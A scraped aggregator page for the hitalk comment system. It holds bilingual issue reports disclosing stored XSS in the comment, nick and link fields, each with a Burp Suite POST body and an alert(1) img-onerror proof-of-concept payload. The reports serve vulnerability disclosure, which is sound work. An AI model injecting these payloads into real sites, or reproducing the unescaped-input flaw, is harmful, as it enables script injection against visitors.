Git Product home page Git Product logo

hitalk's Introduction

hitalk's People

Contributors

dependabot[bot] avatar ihoey avatar imcuttle avatar ivan-nginx avatar yscoder avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

hitalk's Issues

关于表情框(smilies-body)

已按照步骤将一切弄好,appId, appKey以及 Hitalk.js 里的https://hitalk.dode.top 都换成了自己的,表情包用的还是原 cdn.dode.top/newpaopao|alu,其他的都没改,也没报错了。但是表情框(<div class="smilies-body"></div>)内部是空的,不知为何

评论链接处存在XSS漏洞

If you want to report a bug, please provide the following information:

  • The steps to reproduce.
    使用burpsuite提交评论并抓包
    image
    攻击点在link
    post data:
{"comment":"1","rid":"","nick":"Guest","mail":"","link":"\" ></a><img src=x onerror=alert(1)>","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/posts/Hexo/2015-08-28-hello-world.html","pin":0,"like":0,"ACL":{"*":{"read":true}}}

poc:

\" ></a><img src=x onerror=alert(1)>

其效果为:
image
image

english report:
Use burpsuite to submit comments and capture packages
image
The point of attack is at link
post data:

{"comment":"1","rid":"","nick":"Guest","mail":"","link":"\" ></a><img src=x onerror= alert(1)>","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/posts/Hexo/2015-08- 28-hello-world.html","pin":0,"like":0,"ACL":{"*":{"read":true}}}

poc:

\" ></a><img src=x onerror=alert(1)>

The effect is:
image
image

评论正文存在XSS漏洞

If you want to report a bug, please provide the following information:

  • The steps to reproduce.
    使用burpsuite提交评论并抓包
    image
    攻击点在comment
    post data:
{"comment":"<img src=x onerror=alert(1) >\n","rid":"","nick":"Guest","mail":"","link":"","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/posts/Hexo/2015-08-28-hello-world.html","pin":0,"like":0,"ACL":{"*":{"read":true}}}

poc:

<img src=x onerror=alert(1) >\n

其效果为:
image

english report:
Use burpsuite to submit comments and capture packages
image
The point of attack is in comment
post data:

{"comment":"<img src=x onerror=alert(1) >\n","rid":"","nick":"Guest","mail":"","link":"" ,"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/posts/Hexo/2015-08-28-hello-world. html","pin":0,"like":0,"ACL":{"*":{"read":true}}}

poc:

<img src=x onerror=alert(1) >\n

The effect is:
image

评论昵称处存在XSS漏洞

If you want to report a bug, please provide the following information:

  • The steps to reproduce.
    使用burpsuite提交评论并抓包
    image
    攻击点在nick
    post data:
{"comment":"1","rid":"","nick":"Guest</a><img src=x onerror=alert(1) >","mail":"","link":"","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/posts/Hexo/2015-08-28-hello-world.html","pin":0,"like":0,"ACL":{"*":{"read":true}}}

poc:

Guest</a><img src=x onerror=alert(1) >

其效果为:
image
image

english report:
Use burpsuite to submit comments and capture packages
image
The point of attack is nick
post data:

{"comment":"1","rid":"","nick":"Guest</a><img src=x onerror=alert(1) >","mail":"","link" :"","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/posts/Hexo/2015-08-28-hello -world.html","pin":0,"like":0,"ACL":{"*":{"read":true}}}

poc:

Guest</a><img src=x onerror=alert(1)>

The effect is:
image
image

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.